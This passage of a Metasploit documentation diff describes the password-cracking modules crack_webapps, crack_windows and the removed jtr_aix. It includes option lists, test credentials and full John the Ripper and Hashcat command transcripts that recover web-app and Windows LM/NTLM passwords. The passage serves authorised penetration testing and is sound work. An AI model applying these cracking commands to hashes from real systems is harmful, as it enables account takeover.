+[*]    Cracking Command: /usr/sbin/john --session=D6d9Rjcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mediawiki --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 18:59) 50.00g/s 853300p/s 1021Kc/s 1021KC/s thales1913..t1900
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mediawiki hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=D6d9Rjcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mediawiki --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE 1/3 (2019-05-31 18:59) 100.0g/s 4800p/s 4800c/s 4800C/s mediawiki_qwerty..mediawikimediawiki_qwertymediawikimediawiki_qwerty
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mediawiki hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=D6d9Rjcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mediawiki --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[*] Cracking mediawiki hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=D6d9Rjcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mediawiki --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1531   mediawiki         mediawiki_qwerty   qwerty            Normal
+ 1532   mediawiki         mediawiki_hashcat  hashcat           Single
+ 1533   phpass            phpass_p_hashcat   hashcat           Normal
+ 1534   phpass            phpass_h_hashcat   hashcat           Single
+ 1535   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Single
+ 1536   PBKDF2-HMAC-SHA1  atlassian_secret   secret            Normal
+ 1537   PBKDF2-HMAC-SHA1  atlassian_admin    admin             Normal
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                    realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                    -----  ------------        ----------
+                       mediawiki_hashcat  hashcat                                                                           Password            
+                       phpass_p_hashcat   hashcat                                                                           Password            
+                       phpass_h_hashcat   hashcat                                                                           Password            
+                       atlassian_hashcat  hashcat                                                                           Password            
+                       mediawiki_qwerty   $B$113$de2874e33da25313d808d2a8cbf31485                                           Nonreplayable hash  mediawiki
+                       mediawiki_hashcat  $B$56668501$0ce106caa70af57fd525aeaf80ef2898                                      Nonreplayable hash  mediawiki
+                       phpass_p_hashcat   $P$984478476IagS59wHZvyQMArzfx58u.                                                Nonreplayable hash  phpass
+                       phpass_h_hashcat   $H$984478476IagS59wHZvyQMArzfx58u.                                                Nonreplayable hash  phpass
+                       atlassian_hashcat  {PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       atlassian_secret   {PKCS5S2}/eWKocWoBMiEN6aA2SQMm56/qLdCVW0fmGF4zF3CzeyaoZUpW1tE3R/fxnYjGbza         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       atlassian_admin    {PKCS5S2}8WEZjkCbLWysbcbZ5PRgMbdJgJOhkzRT3y1jxOqke2z1Zr79q8ypugFQEYaMoIZt         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       atlassian_secret   secret                                                                            Password            
+                       atlassian_admin    admin                                                                             Password            
+                       mediawiki_qwerty   qwerty                                                                            Password
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_webapps
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-3903-kn244m
+[*] Wordlist file written out to /tmp/jtrtmp20190531-3903-r8ligw
+[*] Checking PBKDF2-HMAC-SHA1 hashes already cracked...
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=hWnnDYym --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12001 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=hWnnDYym --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12001 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m /tmp/jtrtmp20190531-3903-r8ligw
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1549   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Wordlist
+
+[*] Checking phpass hashes already cracked...
+[*] Cracking phpass hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=dZ7kuaal --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=400 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking phpass hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=dZ7kuaal --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=400 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m /tmp/jtrtmp20190531-3903-r8ligw
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1547   phpass            phpass_p_hashcat   hashcat           Wordlist
+ 1549   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Wordlist
+
+[*] Checking mediawiki hashes already cracked...
+[*] Cracking mediawiki hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=nasHCHQx --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3711 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mediawiki hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=nasHCHQx --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3711 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m /tmp/jtrtmp20190531-3903-r8ligw
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1546   mediawiki         mediawiki_hashcat  hashcat           Wordlist
+ 1547   phpass            phpass_p_hashcat   hashcat           Wordlist
+ 1549   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Wordlist
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                    realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                    -----  ------------        ----------
+                       phpass_h_hashcat   $H$984478476IagS59wHZvyQMArzfx58u.                                                Nonreplayable hash  phpass
+                       mediawiki_qwerty   $B$113$de2874e33da25313d808d2a8cbf31485                                           Nonreplayable hash  mediawiki
+                       mediawiki_hashcat  $B$56668501$0ce106caa70af57fd525aeaf80ef2898                                      Nonreplayable hash  mediawiki
+                       mediawiki_hashcat  hashcat                                                                           Password            
+                       atlassian_admin    {PKCS5S2}8WEZjkCbLWysbcbZ5PRgMbdJgJOhkzRT3y1jxOqke2z1Zr79q8ypugFQEYaMoIZt         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       phpass_p_hashcat   hashcat                                                                           Password            
+                       atlassian_hashcat  hashcat                                                                           Password            
+                       atlassian_hashcat  {PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       atlassian_secret   {PKCS5S2}/eWKocWoBMiEN6aA2SQMm56/qLdCVW0fmGF4zF3CzeyaoZUpW1tE3R/fxnYjGbza         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       phpass_p_hashcat   $P$984478476IagS59wHZvyQMArzfx58u.                                                Nonreplayable hash  phpass
+```

documentation/modules/auxiliary/analyze/crack_windows.md

@@ -0,0 +1,354 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode Windows
+  based password hashes, such as:
+
+  * `LANMAN` based passwords
+  * `NTLM` based passwords
+
+| Common | John     | Hashcat |
+|--------|----------|---------|
+| lanman | lm       | 3000    |
+| ntlm   | nt       | 1000    |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `ntlm`, or `lanman` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_windows```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **LANMAN**
+
+   Crack LANMAN hashes.  Default is `true`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **NTLM**
+
+   Crack NTLM hashes.  Default is `true`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:lm_password ntlm:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c jtr:lm
+creds add user:lm2_password ntlm:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c jtr:lm
+creds add user:lm2_pot_password ntlm:e52cac67419fafe2fafe108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c jtr:lm
+creds add user:nt_password ntlm:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c jtr:nt
+echo "" > /root/.msf4/john.pot
+echo "\$LM\$E52CAC67419FAFE2:passwor" >> /root/.msf4/john.pot
+echo "\$LM\$FAFE108F3FA6CB6D:d" >> /root/.msf4/john.pot
+echo "test" > /tmp/wordlist
+echo "password" >> /tmp/wordlist
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_windows
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-32530-1bqr8cd
+[*] Wordlist file written out to /tmp/jtrtmp20190531-32530-1qjwpit
+[*] Checking lm hashes already cracked...
+[*] Cracking lm hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=sFX9A0yc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=lm --wordlist=/tmp/jtrtmp20190531-32530-1qjwpit --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE (2019-05-31 17:07) 200.0g/s 585500p/s 585500c/s 1756KC/s TEST3::..T1900
+Warning: passwords printed above might be partial and not be all those cracked
+Use the "--show --format=LM" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking lm hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=sFX9A0yc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=lm --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Almost done: Processing the remaining buffered candidate passwords, if any.
+Warning: Only 336 candidates buffered for the current salt, minimum 2048 needed for performance.
+Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
+1g 0:00:00:00 DONE 2/3 (2019-05-31 17:07) 50.00g/s 1774Kp/s 1774Kc/s 1774KC/s 123456..SEEKER0
+Warning: passwords printed above might be partial
+Use the "--show --format=LM" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking lm hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=sFX9A0yc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=lm --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+[*] Cracking lm hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=sFX9A0yc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=lm --wordlist=/tmp/jtrtmp20190531-32530-1qjwpit --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1462   lm         lm_password       password          Single
+ 1463   lm         lm2_password      password          Single
+ 1464   lm         lm2_pot_password  password          Already Cracked/POT
+
+[*] Checking nt hashes already cracked...
+[*] Cracking nt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=MUVWOAMV --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=nt --wordlist=/tmp/jtrtmp20190531-32530-1qjwpit --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 17:07) 100.0g/s 19200p/s 19200c/s 19200C/s test3:::..Password12
+Warning: passwords printed above might not be all those cracked
+Use the "--show --format=NT" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking nt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=MUVWOAMV --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=nt --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+[*] Cracking nt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=MUVWOAMV --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=nt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+[*] Cracking nt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=MUVWOAMV --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=nt --wordlist=/tmp/jtrtmp20190531-32530-1qjwpit --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-32530-1bqr8cd
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1462   lm         lm_password       password          Single
+ 1463   lm         lm2_password      password          Single
+ 1464   lm         lm2_pot_password  password          Already Cracked/POT
+ 1465   nt         nt_password       password          Single
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public            private                                                            realm  private_type  JtR Format
+----  ------  -------  ------            -------                                                            -----  ------------  ----------
+                       lm_password       e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm2_password      e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm2_pot_password  e52cac67419fafe2fafe108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       nt_password       aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm2_pot_password  password                                                                  Password      
+                       lm_password       password                                                                  Password      
+                       lm2_password      password                                                                  Password      
+                       nt_password       password                                                                  Password
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_windows
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-32645-186ea6l
+[*] Wordlist file written out to /tmp/jtrtmp20190531-32645-12pwixd
+[*] Checking lm hashes already cracked...
+[*] Cracking lm hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=i26VXnSy --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3000 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-32645-186ea6l
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking lm hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=i26VXnSy --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3000 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-32645-186ea6l /tmp/jtrtmp20190531-32645-12pwixd
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1470   lm         lm_password   [notfound]D       Incremental
+ 1471   lm         lm2_password  [notfound]D       Incremental
+
+[*] Checking nt hashes already cracked...
+[*] Cracking nt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=6lfDPvji --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1000 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-32645-186ea6l
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking nt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=6lfDPvji --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1000 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-32645-186ea6l /tmp/jtrtmp20190531-32645-12pwixd
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1470   lm         lm_password       [notfound]D       Incremental
+ 1471   lm         lm2_password      [notfound]D       Incremental
+ 1472   nt         lm2_pot_password  password          Wordlist
+ 1473   nt         nt_password       password          Wordlist
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public            private                                                            realm  private_type  JtR Format
+----  ------  -------  ------            -------                                                            -----  ------------  ----------
+                       lm_password       e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm2_password      e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm2_pot_password  e52cac67419fafe2fafe108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       nt_password       aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       lm_password       [notfound]D                                                               Password      
+                       lm2_password      [notfound]D                                                               Password      
+                       lm_password       PASSWORD                                                                  Password      
+                       lm2_password      PASSWORD                                                                  Password      
+                       lm_password       password                                                                  Password      
+                       lm2_password      password                                                                  Password      
+                       lm2_pot_password  password                                                                  Password      
+                       nt_password       password                                                                  Password
+```

documentation/modules/auxiliary/analyze/jtr_aix.md

@@ -1,141 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX 
-  based password hashes, such as:
-
-  * `DES` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with a `des` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_aix```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
-```
-
-Crack them:
-
-```
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
-Session completed
-[*] Cracking descrypt hashes in single mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
-Session completed
-[*] Cracking descrypt hashes in incremental mode (Digits)...
